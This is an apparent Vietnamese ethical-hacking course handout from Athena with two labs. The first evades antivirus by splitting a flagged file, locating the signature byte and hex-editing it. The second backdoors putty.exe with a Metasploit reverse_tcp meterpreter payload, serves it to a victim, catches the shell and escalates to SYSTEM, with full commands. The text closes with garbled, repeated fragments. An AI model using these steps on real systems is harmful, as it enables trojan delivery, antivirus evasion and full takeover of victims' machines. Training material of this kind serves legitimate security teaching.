Athena Ethical Hacker Lab Virus Worm Trojan Module By Pass Anti Virus Tạo Trojan Metasploit Bài: By Pass Anti Virus I Mục đích lab - Hầu hết chương trình chống virus nhận dạng file chương trình độc hại dựa signature database update thường xuyên - Các công cụ cần thiết cho lab Các công cụ ta cài đặt máy tính o Dsplit: sử dụng để cắt file thành nhiều phần với độ dài tăng dần o Hex Editor: để sử dụng phân tích chương trình thay đổi giá trị file o Chương trình scan virus để kiểm tra Trong lab ta sử dụng chương trình Avast o File chương AV cảnh báo Trong lab ta sử dụng chương trình “Ice Gold Freezer” o Các cơng cụ scan virus online ví dụ trang web www.virustotal.com II Các bước thực - Ta thử scan file “Ice Gold Freezer” trang web www.virustotal.com 24/43 chương trình nhận dạng Malware Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Copy source “Ice Gold Freezer” vào folder chứa source chương trình Dsplit ta thực trình cắt file thành đoạn sử dụng Avast scan file Thông qua trình ta ước lượng signature nhận virus nằm phần file Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Ta sử dụng Avast scan tất file cắt xác định file byte file bị nhận Virus Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Theo kết hình từ byte thứ 102000 chương trình nhận virus Ta xóa hết file cắt nhỏ - Tiếp tục ta kiểm tra xem từ byte 101000 đến 102000 ? Ta sử dụng khoảng tăng 100 byte - Ta scan file vừa tạo Avast lần Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Kết thu từ file 101900 đến 102000 nhận virus Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Ta tiếp tục kiểm tra phân đoạn từ 101800 đến 101900 với khoảng tăng 10 byte scan lại Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Kết thu từ file 101820 nhận virus - Ta tiếp tục phân tích từ file 101810 đến 101820 với khoảng tăng byte ? Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Đến ta xác định byte 101819 xác định có virus Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Ta thay đổi giá trị 101819 thành giá trị khác Ở ta đánh thêm vào lần phím spacebar Ta thấy xuất thêm giá trị hexa 20 20 hình Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Sau ta thử upload chương trình lên virustotal kiểm tra kết scan ta tỷ lệ 7/42 AV nhận virus Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Bài : Tạo Trojan Metasploit Mục đích lab - Mục đích lab: sử dụng cơng cụ msfpayload msfencode có Metasploit để tạo file Trojan Ta chuẩn bị file thực thi exe Ví dụ ta sử dụng chương trình putty.exe - Sử dụng msfpayload để tạo backdoor Sau ta sử dụng msfencode để by pass anti virus - Sơ đồ lab 234 Attacker 192.168.1.0/24 Victim Các bước thực - Đầu tiên ta copy file putty.exe vào máy backtrack Ta thực câu lệnh bên với giá trị LHOST IP attacker, LPORT port mà máy attacker sử dụng để quản lý kết nối “ /msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.234 LPORT=4455 R | /msfencode -e x86/shikata_ga_nai -c -t exe -x /root/Desktop/putty.exe -o /root/Desktop/putty_backdoor.exe “ Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Sau tạo xong backdoor bước gửi file backdoor đến victim Ví dụ ta start dịch vụ apache2 copy file vào folder /var/www - Khởi động dịch vụ apache kiểm tra download file Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Sau ta chuẩn bị xong thứ ta sử dụng tính “exploit/multi/handler” để quản lý kết nối từ máy victim đến máy attacker msf >use exploit/multi/handler msf exploit(handler) >set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) >set LHOST 192.168.1.234 Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân msf exploit(handler) >set LPORT 4455 LPORT => 4455 msf exploit(handler) >exploit –j - Victim thực thi file putty_backdoor.exe máy attacker có kết nối điều khiển - Tiếp tục ta nhập vào câu lệnh “run post/windows/escalate/bypassuac” metasploit tạo sessions - Ta kết nối vào sessions số cách nhập vào câu lệnh “background” “sessions –l” “sessions –i 5” Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Thông qua kết nối ta nhập vào câu lệnh getprivs, getsystem, getuid để ta có quyền system với máy victim Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân ... exploit(handler) >set LHOST 192.168.1.2 34 Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân msf exploit(handler) >set LPORT 44 55 LPORT => 44 55 msf exploit(handler) >exploit –j - Victim... ta thử upload chương trình lên virustotal kiểm tra kết scan ta tỷ lệ 7 /42 AV nhận virus Tài liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Bài : Tạo Trojan Metasploit Mục đích lab -... scan virus để kiểm tra Trong lab ta sử dụng chương trình Avast o File chương AV cảnh báo Trong lab ta sử dụng chương trình “Ice Gold Freezer” o Các cơng cụ scan virus online ví dụ trang web www.virustotal.com